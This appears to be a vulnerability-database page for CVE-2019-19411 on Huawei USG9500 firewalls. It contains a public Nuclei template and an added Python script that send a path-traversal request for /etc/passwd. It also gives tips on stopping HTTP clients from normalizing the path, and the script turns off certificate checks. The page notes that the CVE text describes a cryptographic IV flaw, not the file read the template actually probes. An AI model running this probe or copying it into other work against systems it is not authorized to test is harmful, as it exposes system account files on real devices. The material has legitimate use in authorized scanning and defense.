CVE-2019-19411: Huawei Firewall - Local File Inclusion

Date: 2025-08-01 | Affected software: Huawei Firewall | PoC: public

Vulnerability description

USG9500 versions V500R001C30SPC100, V500R001C30SPC200, V500R001C30SPC600, V500R001C60SPC500, V500R005C00SPC100 and V500R005C00SPC200 have an information leakage vulnerability. Because the initialization vector used by a specific encryption algorithm is handled improperly, an attacker who can reach that cryptographic primitive may reduce the confidentiality of the data it protects. Note that the CVE text describes a cryptographic weakness, whereas the template below probes for something different: a path-traversal read of /etc/passwd via /umweb/../etc/passwd. A hit on the template therefore indicates an exposed file-read, not the IV flaw itself.

PoC code [public]

id: CVE-2019-19411

info:
  name: Huawei Firewall - Local File Inclusion
  author: taielab
  severity: low
  description: |
    USG9500 with versions of V500R001C30SPC100, V500R001C30SPC200, V500R001C30SPC600, V500R001C60SPC500, V500R005C00SPC100, V500R005C00SPC200 have an information leakage vulnerability. Due to improper processing of the initialization vector used in a specific encryption algorithm, an attacker who gains access to this cryptographic primitive may exploit this vulnerability to cause the value of the confidentiality associated with its use to be diminished.
  reference:
    - https://www.huawei.com/en/psirt/security-advisories/huawei-sa-20200115-01-firewall-en
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 3.7
    cve-id: CVE-2019-19411
    cwe-id: CWE-665
    epss-score: 0.02952
    epss-percentile: 0.85965
    cpe: cpe:2.3:h:huawei:usg9500:-:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: huawei
    product: usg9500
    shodan-query: title:"HUAWEI"
  tags: cve,cve2019,huawei,firewall,lfi

http:
  - method: GET
    path:
      - "{{BaseURL}}/umweb/../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:[x*]:0:0:"

      - type: word
        part: header
        words:
          - "application/octet-stream"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502210090d871214dec3332d439f01ea4954b2bbfd9e70e5272fbff8153ddce17d23a110220161b1be3d09c9bd5bd3083031b1f12384adee644cdbd5909492e7e7167558303:922c64590222798bb761d5b6d8e72950
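The template above sends one GET request and requires all three matchers (status 200, `application/octet-stream` somewhere in the headers, a `root:x:0:0:` or `root:*:0:0:` line in the body) to fire. The following is an added stand-alone reproduction of that check in Python; it is not code from the nuclei-templates project or from Huawei. The two sample responses at the bottom are constructed for offline testing, not captured from a real device, and the host/port arguments are assumptions you supply on the command line.

```python
"""Stand-alone reproduction of the Nuclei check for CVE-2019-19411.

Added example, not code from the nuclei-templates project. It sends
GET /umweb/../etc/passwd with the path left exactly as written and
applies the template's three AND-ed matchers to the response.
"""
import http.client
import re
import ssl
import sys

# Probe path and matchers copied verbatim from the template above.
PROBE_PATH = "/umweb/../etc/passwd"
BODY_RE = re.compile(r"root:[x*]:0:0:")
HEADER_WORD = "application/octet-stream"
EXPECTED_STATUS = 200


def matches(status: int, headers: dict, body: str) -> bool:
    """Replicates `matchers-condition: and`.

    The template's word matcher runs over the whole header block, not only
    Content-Type, so every header name/value pair is searched here too.
    """
    header_block = "\n".join(f"{name}: {value}" for name, value in headers.items())
    return (
        status == EXPECTED_STATUS
        and HEADER_WORD in header_block
        and BODY_RE.search(body) is not None
    )


def check(host: str, port: int = 443, use_tls: bool = True, timeout: float = 10.0) -> bool:
    """Send the probe and return True if all three matchers fire.

    http.client is used deliberately: it writes the request line with the
    path as given, so the '..' segment reaches the target instead of being
    collapsed to /etc/passwd by the client.
    """
    if use_tls:
        # Appliances usually present self-signed certificates; verification
        # is disabled for the probe only.
        ctx = ssl.create_default_context()
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
        conn = http.client.HTTPSConnection(host, port, timeout=timeout, context=ctx)
    else:
        conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("GET", PROBE_PATH, headers={"Host": host, "User-Agent": "Mozilla/5.0"})
        resp = conn.getresponse()
        # A real passwd file is small; 4 KiB is plenty for the regex to hit.
        body = resp.read(4096).decode("utf-8", errors="replace")
        return matches(resp.status, dict(resp.getheaders()), body)
    finally:
        conn.close()


# Constructed sample responses for offline testing (not real device output).
SAMPLE_HIT = (
    200,
    {"Content-Type": "application/octet-stream", "Content-Length": "71"},
    "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n",
)
SAMPLE_MISS = (
    200,
    {"Content-Type": "text/html"},
    "<html><head><title>HUAWEI</title></head><body>login</body></html>",
)


if __name__ == "__main__":
    # Usage: python cve_2019_19411_check.py <host> [port]
    target = sys.argv[1]
    target_port = int(sys.argv[2]) if len(sys.argv) > 2 else 443
    print("vulnerable" if check(target, target_port) else "not vulnerable")
```

When reproducing this by hand, be aware that many HTTP clients normalize dot segments before sending: curl needs `--path-as-is`, and recent urllib3/requests versions will also rewrite `/umweb/../etc/passwd` to `/etc/passwd`, which turns the probe into a plain request for a file that does not exist on the web root. Either outcome reads as "not vulnerable", so confirm the request line on the wire before trusting a negative result.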